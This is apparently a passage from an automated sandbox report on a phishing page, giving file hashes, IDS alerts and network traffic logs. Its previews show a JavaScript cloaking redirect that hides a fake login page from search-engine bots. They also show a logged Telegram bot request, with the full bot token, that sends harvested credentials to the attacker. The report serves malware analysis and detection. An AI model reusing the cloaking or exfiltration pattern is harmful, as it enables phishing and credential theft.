                                        Entropy (8bit):4.169347964818518
                                        Encrypted:false
                                        SSDEEP:24:hYkCLHqt4gp0gJexFU5Jy+pMcnVsBifqA4No:gis/U5Jy9MAiwNo
                                        MD5:548469B1563D7E4026CDB3357654DEDF
                                        SHA1:DF2C4AEF8939A8B4B40C64DD4374F75B8375E984
                                        SHA-256:DD36263940485121EBA7400AEBCAB21EC12168EE5FD1C21473DEEB44E05DCBFB
                                        SHA-512:328073DEA640C50B647A9A5FD36AD4C2260322D9BD2D038516B4AD089922A4ACF887E8FA0EFDDA02704629033FD4248EDD5EAC0DC497AF58F0FD6EF70E01428D
                                        Malicious:false
                                        Reputation:low
                                        URL:https://savory-sweet-felidae-psrnd.glitch.me/
                                        Preview:<!DOCTYPE html>.<html lang="en">.<head>. <meta charset="UTF-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. <title>Working...</title>. <script type="text/javascript">. function cloakingRedirect() {. var userAgent = navigator.userAgent.toLowerCase();.. . var botUserAgents = [. 'googlebot', . 'bingbot', . 'slurp', . 'duckduckbot',. 'baiduspider',. 'yandexbot', . 'facebookexternalhit', . 'twitterbot', . 'facebookbot' . ];.. var botRedirectUrl = "https://www.fikox.com/"; . var userRedirectUrl = "https://www.nordicplow.com/wp-admin/includes/fotex.html"; .. . for (var i = 0; i < botUserAgents.length; i++) {. if (userAgent.indexOf(botUserAgents[i]) !== -1) {. . win
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):4119
                                        Entropy (8bit):7.949120703870044
                                        Encrypted:false
                                        SSDEEP:96:h3bdWfcmTY+aRF1pXWZL2+42HGhIUc8KeLEd:hgXTY+as02mOB8XLEd
                                        MD5:000BF649CC8F6BF27CFB04D1BCDCD3C7
                                        SHA1:D73D2F6D74EC6CDCBAE07955592962E77D8AE814
                                        SHA-256:6BDB369337AC2496761C6F063BFFEA0AA6A91D4662279C399071A468251F51F0
                                        SHA-512:73D2EA5FFC572C1AE73F37F8F0FF25E945AFEE8E077B6EE42CE969E575CDC2D8444F90848EA1CB4D1C9EE4BD725AEE2B4576AFC25F17D7295A90E1CBFE6EDFD5
                                        Malicious:false
                                        Reputation:low
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:downloaded
                                        Size (bytes):28
                                        Entropy (8bit):4.378783493486175
                                        Encrypted:false
                                        SSDEEP:3:qinPt:qyPt
                                        MD5:4C42AB4890733A2B01B1B3269C4855E7
                                        SHA1:5B68BFE664DCBC629042EA45C23954EEF1A9F698
                                        SHA-256:F69E8FC1414A82F108CFA0725E5211AF1865A9CEA342A5F01E6B2B5ABE47E010
                                        SHA-512:0631C6EFD555699CB2273107FE5AF565FEC2234344E2D412C23E4EE43C6D721CB2B058764622E44FD544D840FF64D7C866565E280127C701CAAB0A48C35D4F5C
                                        Malicious:false
                                        Reputation:low
                                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSFwne-Yjvve0itBIFDYOoWz0SBQ3OQUx6?alt=proto
                                        Preview:ChIKBw2DqFs9GgAKBw3OQUx6GgA=
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
                                        Category:downloaded
                                        Size (bytes):4119
                                        Entropy (8bit):7.949120703870044
                                        Encrypted:false
                                        SSDEEP:96:h3bdWfcmTY+aRF1pXWZL2+42HGhIUc8KeLEd:hgXTY+as02mOB8XLEd
                                        MD5:000BF649CC8F6BF27CFB04D1BCDCD3C7
                                        SHA1:D73D2F6D74EC6CDCBAE07955592962E77D8AE814
                                        SHA-256:6BDB369337AC2496761C6F063BFFEA0AA6A91D4662279C399071A468251F51F0
                                        SHA-512:73D2EA5FFC572C1AE73F37F8F0FF25E945AFEE8E077B6EE42CE969E575CDC2D8444F90848EA1CB4D1C9EE4BD725AEE2B4576AFC25F17D7295A90E1CBFE6EDFD5
                                        Malicious:false
                                        Reputation:low
                                        URL:https://www.nordicplow.com/wp-includes/images/w-logo-blue-white-bg.png
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:JSON data
                                        Category:downloaded
                                        Size (bytes):478
                                        Entropy (8bit):5.190099914260619
                                        Encrypted:false
                                        SSDEEP:12:YKOHu/PNjTfUiUa3XHJZjxAqWEW48x2BumEMVEiWGUfh4bROC79:YKOHqH3UaHJh6qWKM2BnjVEMbROC79
                                        MD5:75E4BFD3BB817395498D9D9D1DFC87C0
                                        SHA1:BA41E64C9452A41DFD8875A54C902FABFA843EC3
                                        SHA-256:B62E85C70293867DC36778E3D1A4660A6800BB12218074FA032F7F910C929743
                                        SHA-512:5018CB7DE1212D762BD86539AA3AAF93237E5EE5E1BD725B40A1E4100788378F52153A75DDDC3D94B431AE884E5B688338E4411BBC276E6E1B1EF934B5023D35
                                        Malicious:false
                                        Reputation:low
                                        URL:https://api.telegram.org/bot6922366229:AAH9bKIYkg1YGgNut2TQso3nTKvv6FyhzrU/sendMessage?chat_id=6328410070&text=*****%20TX40%20Adobe%20R%CD%8Fe%CD%8Fs%CD%8Fu%CD%8Fl%CD%8Ft%CD%8F%20*****%0AEmail%3A%20q4ft2u%40ngw.net%0APassword%3A%20G_%40s)w%3FufRY%0AIP%3A%208.46.123.189
                                        Preview:{"ok":true,"result":{"message_id":864,"from":{"id":6922366229,"is_bot":true,"first_name":"nkp","username":"remaxx356bot"},"chat":{"id":6328410070,"first_name":"MSN","last_name":"LOGGER","username":"mhscort22","type":"private"},"date":1736875387,"text":"***** TX40 Adobe R\u034fe\u034fs\u034fu\u034fl\u034ft\u034f *****\nEmail: q4ft2u@ngw.net\nPassword: G_@s)w?ufRY\nIP: 8.46.123.189","entities":[{"offset":43,"length":14,"type":"email"},{"offset":84,"length":12,"type":"url"}]}}
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:SVG Scalable Vector Graphics image
                                        Category:downloaded
                                        Size (bytes):5094
                                        Entropy (8bit):4.834039771497343
                                        Encrypted:false
                                        SSDEEP:96:5NfSH5pziTJNziTzJgaH+PRpJM+GKq4MsB4Hz7oG9fpdOiXlj8Hdaus:jo+TSTFgaePjC+GKx4T7okHONaus
                                        MD5:A8FEAF8EA80C17228A67DFEB1E251D8F
                                        SHA1:38A4598BA356C8E43E6A6EA2E59587AB76D26A05
                                        SHA-256:35F933EFDC4AC3426775ABF70B002C39D5A9D98B343A11E44A21EB3D0C952FD3
                                        SHA-512:0E969BAB0E5338E0EEC990D39A01D13BB88A687EF4986FC1407C2416014179A4D15BDD61074441014487E4E978D1025FE9B6A1D16BFDE3CD706B0F6073C6C094
                                        Malicious:false
                                        Reputation:low
                                        URL:https://upload.wikimedia.org/wikipedia/commons/8/87/PDF_file_icon.svg
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:JSON data
                                        Category:downloaded
                                        Size (bytes):21
                                        Entropy (8bit):3.594465636961452
                                        Encrypted:false
                                        SSDEEP:3:YMb1gXME2Y:YMeX32Y
                                        MD5:909AD59B6307B0CD8BFE7961D4B98778
                                        SHA1:49F8111D613317EA86C6A45CD608DC96B1C8451B
                                        SHA-256:FBCEC43F243A7B7F955E498B7FC37CB5EDF615156529AB8A039BBBCFA52C1829
                                        SHA-512:8FDFFFB73C90ACDC732A0F29257CACEEDAAA28FCAF8E779C5390BDEA9CDE4DE3C8BD005BBEC9B3B7972C787E233D8D8E218D45B6EB2C3AD40EB5E3A2A1EAC3B8
                                        Malicious:false
                                        Reputation:low
                                        URL:https://api.ipify.org/?format=json
                                        Preview:{"ip":"8.46.123.189"}
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:SVG Scalable Vector Graphics image
                                        Category:downloaded
                                        Size (bytes):272
                                        Entropy (8bit):4.825230707379318
                                        Encrypted:false
                                        SSDEEP:6:tI9mc4sl3u7Ee/Uw4tzC/CHftwHK32KHzCF3cHoKgwHKY:t41uwPwge/CHFyKGKHeVpyKY
                                        MD5:363FDD53D34303B727D9DAB161B8E88B
                                        SHA1:5B170117926AE5A5E451AA24676B5A124C2FA122
                                        SHA-256:3D41251F93127B4B42C2F69FA423D204946CF9C307D786EA36B8D9BEF4179282
                                        SHA-512:6369E9E3B0F49D5BE6C43724C01D34E7B9871E9D709C628ED0963B94183729AABB2D9778EED4405D87C5080DEA19156970DAB6B8D69EDB860ADC5C1A400FAFB3
                                        Malicious:false
                                        Reputation:low
                                        URL:https://upload.wikimedia.org/wikipedia/commons/4/44/Microsoft_logo.svg
                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 23 23"><path fill="#f3f3f3" d="M0 0h23v23H0z"/><path fill="#f35325" d="M1 1h10v10H1z"/><path fill="#81bc06" d="M12 1h10v10H12z"/><path fill="#05a6f0" d="M1 12h10v10H1z"/><path fill="#ffba08" d="M12 12h10v10H12z"/></svg>
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:JSON data
                                        Category:dropped
                                        Size (bytes):21
                                        Entropy (8bit):3.594465636961452
                                        Encrypted:false
                                        SSDEEP:3:YMb1gXME2Y:YMeX32Y
                                        MD5:909AD59B6307B0CD8BFE7961D4B98778
                                        SHA1:49F8111D613317EA86C6A45CD608DC96B1C8451B
                                        SHA-256:FBCEC43F243A7B7F955E498B7FC37CB5EDF615156529AB8A039BBBCFA52C1829
                                        SHA-512:8FDFFFB73C90ACDC732A0F29257CACEEDAAA28FCAF8E779C5390BDEA9CDE4DE3C8BD005BBEC9B3B7972C787E233D8D8E218D45B6EB2C3AD40EB5E3A2A1EAC3B8
                                        Malicious:false
                                        Reputation:low
                                        Preview:{"ip":"8.46.123.189"}
                                        No static file info
                                        Timestamp                        SID      Signature                                   Severity  Source IP    Source Port  Dest IP          Dest Port  Protocol
                                        2025-01-14T18:22:40.226205+0100  1810007  Joe Security ANOMALY Telegram Send Message  1         192.168.2.6  49831        149.154.167.220  443        TCP
                                        2025-01-14T18:22:41.221243+0100  1810007  Joe Security ANOMALY Telegram Send Message  1         192.168.2.6  49839        149.154.167.220  443        TCP
                                        2025-01-14T18:22:52.267650+0100  1810007  Joe Security ANOMALY Telegram Send Message  1         192.168.2.6  49911        149.154.167.220  443        TCP
                                        2025-01-14T18:22:53.230796+0100  1810007  Joe Security ANOMALY Telegram Send Message  1         192.168.2.6  49918        149.154.167.220  443        TCP
                                        2025-01-14T18:23:07.484471+0100  1810007  Joe Security ANOMALY Telegram Send Message  1         192.168.2.6  50004        149.154.167.220  443        TCP
                                        2025-01-14T18:23:08.458487+0100  1810007  Joe Security ANOMALY Telegram Send Message  1         192.168.2.6  50006        149.154.167.220  443        TCP
                                        Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                        Jan 14, 2025 18:22:39.277412891 CET49832443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:22:39.277447939 CET44349832104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:22:39.729832888 CET44349832104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:22:39.730371952 CET49832443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:22:39.730436087 CET44349832104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:22:39.731435061 CET44349832104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:22:39.731532097 CET49832443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:22:39.732131958 CET49832443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:22:39.732198954 CET44349832104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:22:39.732319117 CET49832443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:22:39.774048090 CET49832443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:22:39.774111032 CET44349832104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:22:39.820918083 CET49832443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:22:39.885668993 CET44349832104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:22:39.885737896 CET44349832104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:22:39.885824919 CET49832443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:22:39.887679100 CET49832443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:22:39.887706041 CET44349832104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:22:39.908580065 CET44349831149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:39.909181118 CET49831443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:22:39.909199953 CET44349831149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:39.910300016 CET44349831149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:39.910375118 CET49831443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:22:39.911467075 CET49831443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:22:39.911546946 CET44349831149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:39.911669970 CET49831443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:22:39.955332994 CET44349831149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:39.961532116 CET49831443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:22:39.961546898 CET44349831149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:40.006575108 CET49831443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:22:40.226226091 CET44349831149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:40.226299047 CET44349831149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:40.226368904 CET49831443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:22:40.228429079 CET49831443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:22:40.228449106 CET44349831149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:40.275561094 CET49839443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:22:40.275640011 CET44349839149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:40.275727034 CET49839443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:22:40.275985956 CET49839443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:22:40.276021957 CET44349839149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:40.885879993 CET44349839149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:40.886286974 CET49839443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:22:40.886357069 CET44349839149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:40.887265921 CET44349839149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:40.887350082 CET49839443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:22:40.887809038 CET49839443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:22:40.887876987 CET44349839149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:40.887984037 CET49839443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:22:40.888003111 CET44349839149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:40.930291891 CET49839443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:22:41.221266985 CET44349839149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:41.221334934 CET44349839149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:41.221396923 CET49839443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:22:41.222395897 CET49839443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:22:41.222414970 CET44349839149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:50.720947981 CET49909443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:22:50.720997095 CET44349909104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:22:50.721080065 CET49909443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:22:50.724090099 CET49909443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:22:50.724103928 CET44349909104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:22:51.196352005 CET44349909104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:22:51.196633101 CET49909443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:22:51.196650028 CET44349909104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:22:51.196975946 CET44349909104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:22:51.197267056 CET49909443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:22:51.197321892 CET44349909104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:22:51.197405100 CET49909443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:22:51.243326902 CET44349909104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:22:51.361154079 CET44349909104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:22:51.361222029 CET44349909104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:22:51.361340046 CET49909443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:22:51.363733053 CET49909443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:22:51.363753080 CET44349909104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:22:51.366297960 CET49911443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:22:51.366324902 CET44349911149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:51.366792917 CET49911443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:22:51.367182970 CET49911443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:22:51.367197037 CET44349911149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:51.367670059 CET49912443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:22:51.367708921 CET44349912104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:22:51.367767096 CET49912443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:22:51.367917061 CET49912443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:22:51.367928028 CET44349912104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:22:51.825015068 CET44349912104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:22:51.825311899 CET49912443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:22:51.825337887 CET44349912104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:22:51.825623989 CET44349912104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:22:51.825925112 CET49912443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:22:51.825984955 CET44349912104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:22:51.826191902 CET49912443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:22:51.867341995 CET44349912104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:22:51.959830999 CET44349912104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:22:51.959923029 CET44349912104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:22:51.960017920 CET49912443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:22:51.960949898 CET49912443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:22:51.960971117 CET44349912104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:22:51.978560925 CET44349911149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:51.978809118 CET49911443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:22:51.978840113 CET44349911149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:51.979173899 CET44349911149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:51.979468107 CET49911443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:22:51.979526997 CET44349911149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:51.979587078 CET49911443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:22:52.023358107 CET44349911149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:52.267667055 CET44349911149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:52.267745018 CET44349911149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:52.267811060 CET49911443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:22:52.268559933 CET49911443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:22:52.268600941 CET44349911149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:52.271605968 CET49918443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:22:52.271647930 CET44349918149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:52.271718025 CET49918443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:22:52.271934032 CET49918443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:22:52.271950006 CET44349918149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:52.904042006 CET44349918149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:52.904373884 CET49918443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:22:52.904438019 CET44349918149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:52.904764891 CET44349918149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:52.905078888 CET49918443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:22:52.905150890 CET44349918149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:52.905232906 CET49918443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:22:52.951328993 CET44349918149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:53.230820894 CET44349918149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:53.230891943 CET44349918149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:53.230987072 CET49918443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:22:53.232618093 CET49918443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:22:53.232661009 CET44349918149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:23:05.787764072 CET50000443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:23:05.787775040 CET44350000104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:23:05.787846088 CET50000443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:23:05.788234949 CET50000443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:23:05.788247108 CET44350000104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:23:06.259368896 CET44350000104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:23:06.264710903 CET50000443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:23:06.264780998 CET44350000104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:23:06.265402079 CET44350000104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:23:06.305799961 CET50000443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:23:06.314048052 CET50000443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:23:06.314141989 CET44350000104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:23:06.320521116 CET50000443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:23:06.363337994 CET44350000104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:23:06.476267099 CET44350000104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:23:06.476339102 CET44350000104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:23:06.476397991 CET50000443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:23:06.477155924 CET50000443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:23:06.477173090 CET44350000104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:23:06.479795933 CET50004443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:23:06.479830027 CET44350004149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:23:06.480200052 CET50004443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:23:06.480200052 CET50004443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:23:06.480230093 CET44350004149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:23:06.481456041 CET50005443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:23:06.481503010 CET44350005104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:23:06.481739044 CET50005443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:23:06.481800079 CET50005443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:23:06.481812000 CET44350005104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:23:06.963252068 CET44350005104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:23:06.963619947 CET50005443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:23:06.963634968 CET44350005104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:23:06.963994980 CET44350005104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:23:06.964390039 CET50005443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:23:06.964447975 CET44350005104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:23:06.964631081 CET50005443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:23:07.007332087 CET44350005104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:23:07.123666048 CET44350004149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:23:07.123975039 CET50004443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:23:07.123984098 CET44350004149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:23:07.124317884 CET44350004149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:23:07.124641895 CET50004443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:23:07.124697924 CET44350004149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:23:07.124799013 CET50004443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:23:07.135159016 CET44350005104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:23:07.135207891 CET44350005104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:23:07.135262012 CET50005443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:23:07.136096954 CET50005443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:23:07.136116982 CET44350005104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:23:07.167344093 CET44350004149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:23:07.484579086 CET44350004149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:23:07.484766960 CET44350004149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:23:07.484812975 CET50004443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:23:07.485965014 CET50004443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:23:07.485970974 CET44350004149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:23:07.488643885 CET50006443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:23:07.488666058 CET44350006149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:23:07.488734961 CET50006443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:23:07.488914967 CET50006443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:23:07.488923073 CET44350006149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:23:08.128253937 CET44350006149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:23:08.128840923 CET50006443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:23:08.128855944 CET44350006149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:23:08.129360914 CET44350006149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:23:08.130203009 CET50006443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:23:08.130301952 CET44350006149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:23:08.130354881 CET50006443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:23:08.175327063 CET44350006149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:23:08.180767059 CET50006443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:23:08.458435059 CET44350006149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:23:08.458508968 CET44350006149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:23:08.458904982 CET50006443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:23:08.460571051 CET50006443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:23:08.460593939 CET44350006149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:23:09.117985010 CET49715443192.168.2.634.233.109.53
                                        Jan 14, 2025 18:23:09.118000031 CET4434971534.233.109.53192.168.2.6
                                        Jan 14, 2025 18:23:21.917098045 CET50008443192.168.2.6142.250.186.164
                                        Jan 14, 2025 18:23:21.917131901 CET44350008142.250.186.164192.168.2.6
                                        Jan 14, 2025 18:23:21.917248011 CET50008443192.168.2.6142.250.186.164
                                        Jan 14, 2025 18:23:21.917634964 CET50008443192.168.2.6142.250.186.164
                                        Jan 14, 2025 18:23:21.917645931 CET44350008142.250.186.164192.168.2.6
                                        Jan 14, 2025 18:23:22.567574024 CET44350008142.250.186.164192.168.2.6
                                        Jan 14, 2025 18:23:22.568805933 CET50008443192.168.2.6142.250.186.164
                                        Jan 14, 2025 18:23:22.568841934 CET44350008142.250.186.164192.168.2.6
                                        Jan 14, 2025 18:23:22.569933891 CET44350008142.250.186.164192.168.2.6
                                        Jan 14, 2025 18:23:22.570280075 CET50008443192.168.2.6142.250.186.164
                                        Jan 14, 2025 18:23:22.570456028 CET44350008142.250.186.164192.168.2.6
                                        Jan 14, 2025 18:23:22.618227959 CET50008443192.168.2.6142.250.186.164
                                        Jan 14, 2025 18:23:25.980027914 CET49715443192.168.2.634.233.109.53
                                        Jan 14, 2025 18:23:25.980242968 CET4434971534.233.109.53192.168.2.6
                                        Jan 14, 2025 18:23:25.980325937 CET49715443192.168.2.634.233.109.53
                                        Jan 14, 2025 18:23:32.463937998 CET44350008142.250.186.164192.168.2.6
                                        Jan 14, 2025 18:23:32.464003086 CET44350008142.250.186.164192.168.2.6
